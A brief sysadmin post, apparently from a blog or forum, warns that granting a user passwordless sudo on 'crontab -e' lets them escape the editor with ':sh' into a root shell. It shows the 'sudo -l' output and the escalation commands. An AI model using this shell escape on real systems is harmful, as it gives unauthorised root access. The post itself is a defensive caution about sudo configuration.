Good senior engineers stopped a junior SA giving out quite a lot of power recently while setting up a sudo profile.
As you can see below in this example, you can see the users privileges in the sudo profile.
[user@server /root]$ sudo -l Matching Defaults entries for user on this host:env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATELC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",logfile=/var/log/sudo.log Runas and Command-specific defaults for user:User user may run the following commands on this host: (root) NOPASSWD: /usr/bin/crontab -e
Then from there you can as the user do the below
[user@server /root]$ sudo /usr/bin/crontab -e (break out with :sh) [root@server spool]# iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
This then gives you root access.
Just a small pointer to be careful of.